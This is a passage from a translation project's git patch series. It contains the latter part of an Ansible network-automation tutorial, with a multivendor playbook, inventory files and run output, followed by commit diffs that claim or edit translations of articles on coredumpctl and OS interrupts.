programming languages. YAML is itself a superset of JSON, and it’s quite easy to recognize YAML files, as they always start with three dashes (hyphens), `---`. - - -### Play - -One or more plays can exist within an Ansible playbook. In the preceding example, there are two plays within the playbook. Each starts with a _header_ section where play-specific parameters are defined. - -The two plays from that example have the following parameters defined: - -`name` - -The text `PLAY 1 - Top of Rack (TOR) Switches` is arbitrary and is displayed when the playbook runs to improve readability during playbook execution and reporting. This is an optional parameter. - -`hosts` - -As covered previously, this is the host or group of hosts that are automated in this particular play. This is a required parameter. - -`connection` - -As covered previously, this is the type of connection mechanism used for the play. This is an optional parameter, but is commonly set to `local` for network automation plays. - - - -Each play is comprised of one or more tasks. - - - -### Tasks - -Tasks represent what is automated in a declarative manner without worrying about the underlying syntax or "how" the operation is performed. - -In our example, the first play has two tasks. Each task ensures VLAN 10 exists. The first task does this for Cisco Nexus devices, and the second task does this for Arista devices: - -``` -tasks: - - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES - nxos_vlan: - vlan_id=10 - name=WEB_VLAN - host={{ inventory_hostname }} - username=admin - password=admin - when: vendor == "nxos" -``` - -Tasks can also use the `name` parameter just like plays can. As with plays, the text is arbitrary and is displayed when the playbook runs to improve readability during playbook execution and reporting. It is an optional parameter for each task. - -The next line in the example task starts with `nxos_vlan`. This tell us that this task will execute the Ansible module called `nxos_vlan`. - -We’ll now dig deeper into modules. - - - -### Modules - -It is critical to understand modules within Ansible. While any programming language can be used to write Ansible modules as long as they return JSON key-value pairs, they are almost always written in Python. In our example, we see two modules being executed: `nxos_vlan` and `eos_vlan`. The modules are both Python files; and in fact, while you can’t tell from looking at the playbook, the real filenames are _eos_vlan.py_ and _nxos_vlan.py_, respectively. - -Let’s look at the first task in the first play from the preceding example: - -``` - - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES - nxos_vlan: - vlan_id=10 - name=WEB_VLAN - host={{ inventory_hostname }} - username=admin - password=admin - when: vendor == "nxos" -``` - -This task executes `nxos_vlan`, which is a module that automates VLAN configuration. In order to use modules, including this one, you need to specify the desired state or configuration policy you want the device to have. This example states: VLAN 10 should be configured with the name `WEB_VLAN`, and it should exist on each switch being automated. We can see this easily with the `vlan_id`and `name` parameters. There are three other parameters being passed into the module as well. They are `host`, `username`, and `password`: - -`host` - -This is the hostname (or IP address) of the device being automated. Since the hosts we want to automate are already defined in the inventory file, we can use the built-in Ansible variable `inventory_hostname`. This variable is equal to what is in the inventory file. For example, on the first iteration, the host in the inventory file is `rack1-tor1`, and on the second iteration, it is `rack1-tor2`. These names are passed into the module and then within the module, a DNS lookup occurs on each name to resolve it to an IP address. Then the communication begins with the device. - -`username` - -Username used to log in to the switch. - - -`password` - -Password used to log in to the switch. - - -The last piece to cover here is the use of the `when` statement. This is how Ansible performs conditional tasks within a play. As we know, there are multiple devices and types of devices that exist within the `tor` group for this play. Using `when` offers an option to be more selective based on any criteria. Here we are only automating Cisco devices because we are using the `nxos_vlan` module in this task, while in the next task, we are automating only the Arista devices because the `eos_vlan` module is used. - -###### Note - -This isn’t the only way to differentiate between devices. This is being shown to illustrate the use of `when` and that variables can be defined within the inventory file. - -Defining variables in an inventory file is great for getting started, but as you continue to use Ansible, you’ll want to use YAML-based variables files to help with scale, versioning, and minimizing change to a given file. This will also simplify and improve readability for the inventory file and each variables file used. An example of a variables file was given earlier when the build/push method of device provisioning was covered. - -Here are a few other points to understand about the tasks in the last example: - -* Play 1 task 1 shows the `username` and `password` hardcoded as parameters being passed into the specific module (`nxos_vlan`). - -* Play 1 task 1 and play 2 passed variables into the module instead of hardcoding them. This masks the `username` and `password`parameters, but it’s worth noting that these variables are being pulled from the inventory file (for this example). - -* Play 1 uses a _horizontal_ key=value syntax for the parameters being passed into the modules, while play 2 uses the vertical key=value syntax. Both work just fine. You can also use vertical YAML syntax with "key: value" syntax. - -* The last task also introduces how to use a _loop_ within Ansible. This is by using `with_items` and is analogous to a for loop. That particular task is looping through five VLANs to ensure they all exist on the switch. Note: it’s also possible to store these VLANs in an external YAML variables file as well. Also note that the alternative to not using `with_items` would be to have one task per VLAN—and that just wouldn’t scale! - - -### Hands-on Look at Using Ansible for Network Automation - -In the previous chapter, a general overview of Ansible terminology was provided. This covered many of the specific Ansible terms, such as playbooks, plays, tasks, modules, and inventory files. This section will continue to provide working examples of using Ansible for network automation, but will provide more detail on working with modules to automate a few different types of devices. Examples will include automating devices from multiple vendors, including Cisco, Arista, Cumulus, and Juniper. - -The examples in this section assume the following: - -* Ansible is installed. - -* The proper APIs are enabled on the devices (NX-API, eAPI, NETCONF). - -* Users exist with the proper permissions on the system to make changes via the API. - -* All Ansible modules exist on the system and are in the library path. - -###### Note - -Setting the module and library path can be done within the _ansible.cfg_ file. You can also use the `-M` flag from the command line to change it when executing a playbook. - -The inventory used for the examples in this section is shown in the following section (with passwords removed and IP addresses changed). In this example, some hostnames are not FQDNs as they were in the previous examples. - - -### Inventory File - -``` -[cumulus] -cvx ansible_ssh_host=1.2.3.4 ansible_ssh_pass=PASSWORD - -[arista] -veos1 - -[cisco] -nx1 hostip=5.6.7.8 un=USERNAME pwd=PASSWORD - -[juniper] -vsrx hostip=9.10.11.12 un=USERNAME pwd=PASSWORD -``` - -###### Note - -Just in case you’re wondering at this point, Ansible does support functionality that allows you to store passwords in encrypted files. If you want to learn more about this feature, check out [Ansible Vault][5] in the docs on the Ansible website. - -This inventory file has four groups defined with a single host in each group. Let’s review each section in a little more detail: - -Cumulus - -The host `cvx` is a Cumulus Linux (CL) switch, and it is the only device in the `cumulus` group. Remember that CL is native Linux, so this means the default connection mechanism (SSH) is used to connect to and automate the CL switch. Because `cvx` is not defined in DNS or _/etc/hosts_, we’ll let Ansible know not to use the hostname defined in the inventory file, but rather the name/IP defined for `ansible_ssh_host`. The username to log in to the CL switch is defined in the playbook, but you can see that the password is being defined in the inventory file using the `ansible_ssh_pass` variable. - -Arista - -The host called `veos1` is an Arista switch running EOS. It is the only host that exists within the `arista` group. As you can see for Arista, there are no other parameters defined within the inventory file. This is because Arista uses a special configuration file for their devices. This file is called _.eapi.conf_ and for our example, it is stored in the home directory. Here is the conf file being used for this example to function properly: - -``` -[connection:veos1] -host: 2.4.3.4 -username: unadmin -password: pwadmin -``` - -This file contains all required information for Ansible (and the Arista Python library called _pyeapi_) to connect to the device using just the information as defined in the conf file. - -Cisco - -Just like with Cumulus and Arista, there is only one host (`nx1`) that exists within the `cisco` group. This is an NX-OS-based Cisco Nexus switch. Notice how there are three variables defined for `nx1`. They include `un` and `pwd`, which are accessed in the playbook and passed into the Cisco modules in order to connect to the device. In addition, there is a parameter called `hostip`. This is required because `nx1` is also not defined in DNS or configured in the _/etc/hosts_ file. - - -###### Note - -We could have named this parameter anything. If automating a native Linux device, `ansible_ssh_host` is used just like we saw with the Cumulus example (if the name as defined in the inventory is not resolvable). In this example, we could have still used `ansible_ssh_host`, but it is not a requirement, since we’ll be passing this variable as a parameter into Cisco modules, whereas `ansible_ssh_host` is automatically checked when using the default SSH connection mechanism. - -Juniper - -As with the previous three groups and hosts, there is a single host `vsrx` that is located within the `juniper` group. The setup within the inventory file is identical to that of Cisco’s as both are used the same exact way within the playbook. - - -### Playbook - -The next playbook has four different plays. Each play is built to automate a specific group of devices based on vendor type. Note that this is only one way to perform these tasks within a single playbook. There are other ways in which we could have used conditionals (`when` statement) or created Ansible roles (which is not covered in this report). - -Here is the example playbook: - -``` ---- - - - name: PLAY 1 - CISCO NXOS - hosts: cisco - connection: local - - tasks: - - name: ENSURE VLAN 100 exists on Cisco Nexus switches - nxos_vlan: - vlan_id=100 - name=web_vlan - host={{ hostip }} - username={{ un }} - password={{ pwd }} - - - name: PLAY 2 - ARISTA EOS - hosts: arista - connection: local - - tasks: - - name: ENSURE VLAN 100 exists on Arista switches - eos_vlan: - vlanid=100 - name=web_vlan - connection={{ inventory_hostname }} - - - name: PLAY 3 - CUMULUS - remote_user: cumulus - sudo: true - hosts: cumulus - - tasks: - - name: ENSURE 100.10.10.1 is configured on swp1 - cl_interface: name=swp1 ipv4=100.10.10.1/24 - - - name: restart networking without disruption - shell: ifreload -a - - - name: PLAY 4 - JUNIPER SRX changes - hosts: juniper - connection: local - - tasks: - - name: INSTALL JUNOS CONFIG - junos_install_config: - host={{ hostip }} - file=srx_demo.conf - user={{ un }} - passwd={{ pwd }} - logfile=deploysite.log - overwrite=yes - diffs_file=junpr.diff -``` - -You will notice the first two plays are very similar to what we already covered in the original Cisco and Arista example. The only difference is that each group being automated (`cisco` and `arista`) is defined in its own play, and this is in contrast to using the `when`conditional that was used earlier. - -There is no right way or wrong way to do this. It all depends on what information is known up front and what fits your environment and use cases best, but our intent is to show a few ways to do the same thing. - -The third play automates the configuration of interface `swp1` that exists on the Cumulus Linux switch. The first task within this play ensures that `swp1` is a Layer 3 interface and is configured with the IP address 100.10.10.1\. Because Cumulus Linux is native Linux, the networking service needs to be restarted for the changes to take effect. This could have also been done using Ansible handlers (out of the scope of this report). There is also an Ansible core module called `service` that could have been used, but that would disrupt networking on the switch; using `ifreload` restarts networking non-disruptively. - -Up until now in this section, we looked at Ansible modules focused on specific tasks such as configuring interfaces and VLANs. The fourth play uses another option. We’ll look at a module that _pushes_ a full configuration file and immediately activates it as the new running configuration. This is what we showed previously using `napalm_install_config`, but this example uses a Juniper-specific module called `junos_install_config`. - -This module `junos_install_config` accepts several parameters, as seen in the example. By now, you should understand what `user`, `passwd`, and `host` are used for. The other parameters are defined as follows: - -`file` - -This is the config file that is copied from the Ansible control host to the Juniper device. - -`logfile` - -This is optional, but if specified, it is used to store messages generated while executing the module. - -`overwrite` - -When set to yes/true, the complete configuration is replaced with the file being sent (default is false). - -`diffs_file` - -This is optional, but if specified, will store the diffs generated when applying the configuration. An example of the diff generated when just changing the hostname but still sending a complete config file is shown next: - -``` -# filename: junpr.diff -[edit system] -- host-name vsrx; -+ host-name vsrx-demo; -``` - - -That covers the detailed overview of the playbook. Let’s take a look at what happens when the playbook is executed: - -###### Note - -Note: the `-i` flag is used to specify the inventory file to use. The `ANSIBLE_HOSTS`environment variable can also be set rather than using the flag each time a playbook is executed. - -``` -ntc@ntc:~/ansible/multivendor$ ansible-playbook -i inventory demo.yml - -PLAY [PLAY 1 - CISCO NXOS] ************************************************* - -TASK: [ENSURE VLAN 100 exists on Cisco Nexus switches] ********************* -changed: [nx1] - -PLAY [PLAY 2 - ARISTA EOS] ************************************************* - -TASK: [ENSURE VLAN 100 exists on Arista switches] ************************** -changed: [veos1] - -PLAY [PLAY 3 - CUMULUS] **************************************************** - -GATHERING FACTS ************************************************************ -ok: [cvx] - -TASK: [ENSURE 100.10.10.1 is configured on swp1] *************************** -changed: [cvx] - -TASK: [restart networking without disruption] ****************************** -changed: [cvx] - -PLAY [PLAY 4 - JUNIPER SRX changes] **************************************** - -TASK: [INSTALL JUNOS CONFIG] *********************************************** -changed: [vsrx] - -PLAY RECAP *************************************************************** - to retry, use: --limit @/home/ansible/demo.retry - -cvx : ok=3 changed=2 unreachable=0 failed=0 -nx1 : ok=1 changed=1 unreachable=0 failed=0 -veos1 : ok=1 changed=1 unreachable=0 failed=0 -vsrx : ok=1 changed=1 unreachable=0 failed=0 -``` - -You can see that each task completes successfully; and if you are on the terminal, you’ll see that each changed task was displayed with an amber color. - -Let’s run this playbook again. By running it again, we can verify that all of the modules are _idempotent_; and when doing this, we see that NO changes are made to the devices and everything is green: - -``` -PLAY [PLAY 1 - CISCO NXOS] *************************************************** - -TASK: [ENSURE VLAN 100 exists on Cisco Nexus switches] *********************** -ok: [nx1] - -PLAY [PLAY 2 - ARISTA EOS] *************************************************** - -TASK: [ENSURE VLAN 100 exists on Arista switches] **************************** -ok: [veos1] - -PLAY [PLAY 3 - CUMULUS] ****************************************************** - -GATHERING FACTS ************************************************************** -ok: [cvx] - -TASK: [ENSURE 100.10.10.1 is configured on swp1] ***************************** -ok: [cvx] - -TASK: [restart networking without disruption] ******************************** -skipping: [cvx] - -PLAY [PLAY 4 - JUNIPER SRX changes] ****************************************** - -TASK: [INSTALL JUNOS CONFIG] ************************************************* -ok: [vsrx] - -PLAY RECAP *************************************************************** -cvx : ok=2 changed=0 unreachable=0 failed=0 -nx1 : ok=1 changed=0 unreachable=0 failed=0 -veos1 : ok=1 changed=0 unreachable=0 failed=0 -vsrx : ok=1 changed=0 unreachable=0 failed=0 -``` - -Notice how there were 0 changes, but they still returned "ok" for each task. This verifies, as expected, that each of the modules in this playbook are idempotent. - - -### Summary - -Ansible is a super-simple automation platform that is agentless and extensible. The network community continues to rally around Ansible as a platform that can be used for network automation tasks that range from configuration management to data collection and reporting. You can push full configuration files with Ansible, configure specific network resources with idempotent modules such as interfaces or VLANs, or simply just automate the collection of information such as neighbors, serial numbers, uptime, and interface stats, and customize reports as you need them. - -Because of its architecture, Ansible proves to be a great tool available here and now that helps bridge the gap from _legacy CLI/SNMP_ network device automation to modern _API-driven_ automation. - -Ansible’s ease of use and agentless architecture accounts for the platform’s increasing following within the networking community. Again, this makes it possible to automate devices without APIs (CLI/SNMP); devices that have modern APIs, including standalone switches, routers, and Layer 4-7 service appliances; and even those software-defined networking (SDN) controllers that offer RESTful APIs. - -There is no device left behind when using Ansible for network automation. - ------------ - -作者简介: - - ![](https://d3tdunqjn7n0wj.cloudfront.net/360x360/jason-edelman-crop-5b2672f569f553a3de3a121d0179efcb.jpg) - -Jason Edelman, CCIE 15394 & VCDX-NV 167, is a born and bred network engineer from the great state of New Jersey. He was the typical “lover of the CLI” or “router jockey.” At some point several years ago, he made the decision to focus more on software, development practices, and how they are converging with network engineering. Jason currently runs a boutique consulting firm, Network to Code, helping vendors and end users take advantage of new tools and technologies to reduce their operational inefficiencies. Jason has a Bachelor’s... - --------------------------------------------------------------------------------- - -via: https://www.oreilly.com/learning/network-automation-with-ansible - -作者:[Jason Edelman][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.oreilly.com/people/ee4fd-jason-edelman -[1]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_terminology_and_getting_started -[2]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_network_integrations -[3]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_terminology_and_getting_started -[4]:https://www.oreilly.com/learning/network-automation-with-ansible#handson_look_at_using_ansible_for_network_automation -[5]:http://docs.ansible.com/ansible/playbooks_vault.html -[6]:https://www.oreilly.com/people/ee4fd-jason-edelman -[7]:https://www.oreilly.com/people/ee4fd-jason-edelman From 923e472159cad6d4f8c3c310d6db38b0652f1fe2 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Tue, 28 Nov 2017 16:44:42 +0800 Subject: [PATCH 0028/1627] Translating by qhwdw Translating by qhwdw --- ...all Software from Source Code... and Remove it Afterwards.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md index eb4a201931..d2b16a0b18 100644 --- a/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md +++ b/sources/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md @@ -1,4 +1,4 @@ -"Translating by syys96" +Translating by qhwdw How to Install Software from Source Code… and Remove it Afterwards ============================================================ From 477abba05064e444726314e10389442fbac0d3b5 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 28 Nov 2017 20:21:38 +0800 Subject: [PATCH 0029/1627] translating by darksun --- sources/tech/20171117 How to Easily Remember Linux Commands.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171117 How to Easily Remember Linux Commands.md b/sources/tech/20171117 How to Easily Remember Linux Commands.md index 7bb68a10fd..fe69efb128 100644 --- a/sources/tech/20171117 How to Easily Remember Linux Commands.md +++ b/sources/tech/20171117 How to Easily Remember Linux Commands.md @@ -1,3 +1,4 @@ +translating by darksun # How to Easily Remember Linux Commands ![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) From 250b30b0d393e584611e4e4153cdc1f53a8022b7 Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:21:57 +0800 Subject: [PATCH 0030/1627] Update 20171012 Linux Networking Hardware for Beginners Think Software.md Linux Networking Hardware for Beginners: Think Software --- ...12 Linux Networking Hardware for Beginners Think Software.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md index 1411c0eb87..661f5bc2df 100644 --- a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md @@ -1,3 +1,5 @@ +Translating by FelixYFZ + Linux Networking Hardware for Beginners: Think Software ============================================================ From f54d00af158c548940161706d798df15da1bf00f Mon Sep 17 00:00:00 2001 From: liuyakun Date: Tue, 28 Nov 2017 21:41:56 +0800 Subject: [PATCH 0031/1627] =?UTF-8?q?=E3=80=90liuxinyu123=20=E7=BF=BB?= =?UTF-8?q?=E8=AF=91=E4=B8=AD=E3=80=91?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ning System Services in Red Hat Enterprise Linux – Part 1.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md b/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md index 6f6c6fd16e..2193b8078c 100644 --- a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md +++ b/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md @@ -1,3 +1,5 @@ +translating by liuxinyu123 + Containing System Services in Red Hat Enterprise Linux – Part 1 ============================================================ From ebc5b78f4a40097896978289b83af7ce37982612 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 28 Nov 2017 23:04:59 +0800 Subject: [PATCH 0032/1627] PRF&PUB:20171110 File better bugs with coredumpctl.md @geekpi --- ...71110 File better bugs with coredumpctl.md | 39 ++++++++++--------- 1 file changed, 20 insertions(+), 19 deletions(-) rename {translated/tech => published}/20171110 File better bugs with coredumpctl.md (50%) diff --git a/translated/tech/20171110 File better bugs with coredumpctl.md b/published/20171110 File better bugs with coredumpctl.md similarity index 50% rename from translated/tech/20171110 File better bugs with coredumpctl.md rename to published/20171110 File better bugs with coredumpctl.md index 06d7d700f7..e06604ef3f 100644 --- a/translated/tech/20171110 File better bugs with coredumpctl.md +++ b/published/20171110 File better bugs with coredumpctl.md @@ -1,34 +1,35 @@ -# [用 coredumpctl 更好地记录 bug][1] +用 coredumpctl 更好地记录 bug +=========== ![](https://fedoramagazine.org/wp-content/uploads/2017/11/coredump.png-945x400.jpg) -一个不幸的事实是,所有的软件都有 bug,一些 bug 会导致系统崩溃。当它出现的时候,它经常会在磁盘上留下一个名为 _core dump_ 的数据文件。该文件包含有关系统崩溃时的相关数据,可能有助于确定发生崩溃的原因。通常开发者要求有显示导致崩溃的指令流的 _backtrace_ 形式的数据。开发人员可以使用它来修复 bug 并改进系统。如果系统崩溃,以下是如何轻松生成 backtrace 的方法。 +一个不幸的事实是,所有的软件都有 bug,一些 bug 会导致系统崩溃。当它出现的时候,它经常会在磁盘上留下一个被称为“核心转储core dump”的数据文件。该文件包含有关系统崩溃时的相关数据,可能有助于确定发生崩溃的原因。通常开发者要求提供 “回溯backtrace” 形式的数据,以显示导致崩溃的指令流。开发人员可以使用它来修复 bug 以改进系统。如果系统发生了崩溃,以下是如何轻松生成 回溯backtrace 的方法。 -### 开始使用 coredumpctl +### 从使用 coredumpctl 开始 -大多数 Fedora 系统使用[自动错误报告工具 (ABRT)][2]来自动捕获崩溃文件并记录 bug。但是,如果你禁用了此服务或删除了该软件包,则此方法可能会有所帮助。 +大多数 Fedora 系统使用[自动错误报告工具(ABRT)][2]来自动捕获崩溃文件并记录 bug。但是,如果你禁用了此服务或删除了该软件包,则此方法可能会有所帮助。 -如果你遇到系统崩溃,请首先确保你运行的是最新的软件。更新通常包含修复程序,这些更新通常含有已经发现的会导致严重错误和崩溃的错误的修复。当你更新后,请尝试重新创建导致错误的情况。 +如果你遇到系统崩溃,请首先确保你运行的是最新的软件。更新通常包含修复程序,这些更新通常含有已经发现的会导致严重错误和崩溃的错误的修复。当你更新后,请尝试重现导致错误的情况。 -如果崩溃仍然发生,或者你已经在运行最新的软件,那么可以使用有用的 _coredumpctl_。此程序可帮助查找和处理崩溃。要查看系统上所有核心转储列表,请运行以下命令: +如果崩溃仍然发生,或者你已经在运行最新的软件,那么可以使用有用的 `coredumpctl` 工具。此程序可帮助查找和处理崩溃。要查看系统上所有核心转储列表,请运行以下命令: ``` coredumpctl list ``` -如果你看到比预期长的列表,请不要感到惊讶。有时系统组件在后台默默地崩溃,并自行恢复。现在快速查找转储的简单方法是使用 _-since_ 选项: +如果你看到比预期长的列表,请不要感到惊讶。有时系统组件在后台默默地崩溃,并自行恢复。快速查找今天的转储的简单方法是使用 `-since` 选项: ``` coredumpctl list --since=today ``` -_PID_ 列包含用于标识转储的进程 ID。请注意这个数字,因为你会之后再用到它。或者,如果你不想记住它,使用下面的命令将它赋值给一个变量: +“PID” 列包含用于标识转储的进程 ID。请注意这个数字,因为你会之后再用到它。或者,如果你不想记住它,使用下面的命令将它赋值给一个变量: ``` MYPID= ``` -要查看关于核心转储的信息,请使用此命令(使用 _$MYPID_ 变量或替换 PID 编号): +要查看关于核心转储的信息,请使用此命令(使用 `$MYPID` 变量或替换 PID 编号): ``` coredumpctl info $MYPID @@ -36,42 +37,42 @@ coredumpctl info $MYPID ### 安装 debuginfo 包 -在核心转储中的数据以及原始代码中的指令之间调试符号转义。这个符号数据可能相当大。因此,符号以 _debuginfo_ 软件包的形式与大多数用户使用的 Fedora 系统分开安装。要确定你必须安装哪些 debuginfo 包,请先运行以下命令: +在核心转储中的数据以及原始代码中的指令之间调试符号转义。这个符号数据可能相当大。与大多数用户运行在 Fedora 系统上的软件包不同,符号以 “debuginfo” 软件包的形式安装。要确定你必须安装哪些 debuginfo 包,请先运行以下命令: ``` coredumpctl gdb $MYPID ``` -这可能会在屏幕上显示大量信息。最后一行可能会告诉你使用 _dnf_ 安装更多的 debuginfo 软件包。[用 sudo ][3]运行该命令: +这可能会在屏幕上显示大量信息。最后一行可能会告诉你使用 `dnf` 安装更多的 debuginfo 软件包。[用 sudo ][3]运行该命令以安装: ``` sudo dnf debuginfo-install  ``` -然后再次尝试 _coredumpctl gdb $MYPID_ 命令。**你可能需要重复执行此操作**,因为其他符号会在 trace 中展开。 +然后再次尝试 `coredumpctl gdb $MYPID` 命令。**你可能需要重复执行此操作**,因为其他符号会在回溯中展开。 -### 捕获 backtrace +### 捕获回溯 -运行以下命令以在调试器中记录信息: +在调试器中运行以下命令以记录信息: ``` set logging file mybacktrace.txt set logging on ``` -你可能会发现关闭分页有帮助。对于长的 backtrace,这可以节省时间。 +你可能会发现关闭分页有帮助。对于长的回溯,这可以节省时间。 ``` set pagination off ``` -现在运行 backtrace: +现在运行回溯: ``` thread apply all bt full ``` -现在你可以输入 _quit_ 来退出调试器。_mybacktrace.txt_ 包含可附加到 bug 或问题的追踪信息。或者,如果你正在与某人实时合作,则可以将文本上传到 pastebin。无论哪种方式,你现在可以向开发人员提供更多的帮助来解决问题。 +现在你可以输入 `quit` 来退出调试器。`mybacktrace.txt` 包含可附加到 bug 或问题的追踪信息。或者,如果你正在与某人实时合作,则可以将文本上传到 pastebin。无论哪种方式,你现在可以向开发人员提供更多的帮助来解决问题。 --------------------------------- @@ -85,9 +86,9 @@ Paul W. Frields 自 1997 年以来一直是 Linux 用户和爱好者,并于 20 via: https://fedoramagazine.org/file-better-bugs-coredumpctl/ -作者:[Paul W. Frields ][a] +作者:[Paul W. Frields][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 8003cf12b90de8a930edc9bf74d2b3a0cde6bca7 Mon Sep 17 00:00:00 2001 From: Cwndmiao Date: Tue, 28 Nov 2017 23:33:08 +0800 Subject: [PATCH 0033/1627] translated "20141028 When Does Your OS Run.md" --- .../tech/20141028 When Does Your OS Run.md | 55 ------------------- .../tech/20141028 When Does Your OS Run.md | 53 ++++++++++++++++++ 2 files changed, 53 insertions(+), 55 deletions(-) delete mode 100644 sources/tech/20141028 When Does Your OS Run.md create mode 100644 translated/tech/20141028 When Does Your OS Run.md diff --git a/sources/tech/20141028 When Does Your OS Run.md b/sources/tech/20141028 When Does Your OS Run.md deleted file mode 100644 index 0545ab579d..0000000000 --- a/sources/tech/20141028 When Does Your OS Run.md +++ /dev/null @@ -1,55 +0,0 @@ -Translating by Cwndmiao - -When Does Your OS Run? -============================================================ - - -Here’s a question: in the time it takes you to read this sentence, has your OS been  _running_ ? Or was it only your browser? Or were they perhaps both idle, just waiting for you to  _do something already_ ? - -These questions are simple but they cut through the essence of how software works. To answer them accurately we need a good mental model of OS behavior, which in turn informs performance, security, and troubleshooting decisions. We’ll build such a model in this post series using Linux as the primary OS, with guest appearances by OS X and Windows. I’ll link to the Linux kernel sources for those who want to delve deeper. - -The fundamental axiom here is that  _at any given moment, exactly one task is active on a CPU_ . The task is normally a program, like your browser or music player, or it could be an operating system thread, but it is one task. Not two or more. Never zero, either. One. Always. - -This sounds like trouble. For what if, say, your music player hogs the CPU and doesn’t let any other tasks run? You would not be able to open a tool to kill it, and even mouse clicks would be futile as the OS wouldn’t process them. You could be stuck blaring “What does the fox say?” and incite a workplace riot. - -That’s where interrupts come in. Much as the nervous system interrupts the brain to bring in external stimuli – a loud noise, a touch on the shoulder – the [chipset][1] in a computer’s motherboard interrupts the CPU to deliver news of outside events – key presses, the arrival of network packets, the completion of a hard drive read, and so on. Hardware peripherals, the interrupt controller on the motherboard, and the CPU itself all work together to implement these interruptions, called interrupts for short. - -Interrupts are also essential in tracking that which we hold dearest: time. During the [boot process][2] the kernel programs a hardware timer to issue timer interrupts at a periodic interval, for example every 10 milliseconds. When the timer goes off, the kernel gets a shot at the CPU to update system statistics and take stock of things: has the current program been running for too long? Has a TCP timeout expired? Interrupts give the kernel a chance to both ponder these questions and take appropriate actions. It’s as if you set periodic alarms throughout the day and used them as checkpoints: should I be doing what I’m doing right now? Is there anything more pressing? One day you find ten years have got behind you. - -These periodic hijackings of the CPU by the kernel are called ticks, so interrupts quite literally make your OS tick. But there’s more: interrupts are also used to handle some software events like integer overflows and page faults, which involve no external hardware. Interrupts are the most frequent and crucial entry point into the OS kernel. They’re not some oddity for the EE people to worry about, they’re  _the_  mechanism whereby your OS runs. - -Enough talk, let’s see some action. Below is a network card interrupt in an Intel Core i5 system. The diagrams now have image maps, so you can click on juicy bits for more information. For example, each device links to its Linux driver. - -![](http://duartes.org/gustavo/blog/img/os/hardware-interrupt.png) - - - -Let’s take a look at this. First off, since there are many sources of interrupts, it wouldn’t be very helpful if the hardware simply told the CPU “hey, something happened!” and left it at that. The suspense would be unbearable. So each device is assigned an interrupt request line, or IRQ, during power up. These IRQs are in turn mapped into interrupt vectors, a number between 0 and 255, by the interrupt controller. By the time an interrupt reaches the CPU it has a nice, well-defined number insulated from the vagaries of hardware. - -The CPU in turn has a pointer to what’s essentially an array of 255 functions, supplied by the kernel, where each function is the handler for that particular interrupt vector. We’ll look at this array, the Interrupt Descriptor Table (IDT), in more detail later on. - -Whenever an interrupt arrives, the CPU uses its vector as an index into the IDT and runs the appropriate handler. This happens as a special function call that takes place in the context of the currently running task, allowing the OS to respond to external events quickly and with minimal overhead. So web servers out there indirectly  _call a function in your CPU_  when they send you data, which is either pretty cool or terrifying. Below we show a situation where a CPU is busy running a Vim command when an interrupt arrives: - -![](http://duartes.org/gustavo/blog/img/os/vim-interrupted.png) - -Notice how the interrupt’s arrival causes a switch to kernel mode and [ring zero][3] but it  _does not change the active task_ . It’s as if Vim made a magic function call straight into the kernel, but Vim is  _still there_ , its [address space][4] intact, waiting for that call to return. - -Exciting stuff! Alas, I need to keep this post-sized, so let’s finish up for now. I understand we have not answered the opening question and have in fact opened up new questions, but you now suspect ticks were taking place while you read that sentence. We’ll find the answers as we flesh out our model of dynamic OS behavior, and the browser scenario will become clear. If you have questions, especially as the posts come out, fire away and I’ll try to answer them in the posts themselves or as comments. Next installment is tomorrow on [RSS][5] and [Twitter][6]. - --------------------------------------------------------------------------------- - -via: http://duartes.org/gustavo/blog/post/when-does-your-os-run/ - -作者:[gustavo ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://duartes.org/gustavo/blog/about/ -[1]:http://duartes.org/gustavo/blog/post/motherboard-chipsets-memory-map -[2]:http://duartes.org/gustavo/blog/post/kernel-boot-process -[3]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection -[4]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory -[5]:http://feeds.feedburner.com/GustavoDuarte -[6]:http://twitter.com/food4hackers diff --git a/translated/tech/20141028 When Does Your OS Run.md b/translated/tech/20141028 When Does Your OS Run.md new file mode 100644 index 0000000000..893dd9fb48 --- /dev/null +++ 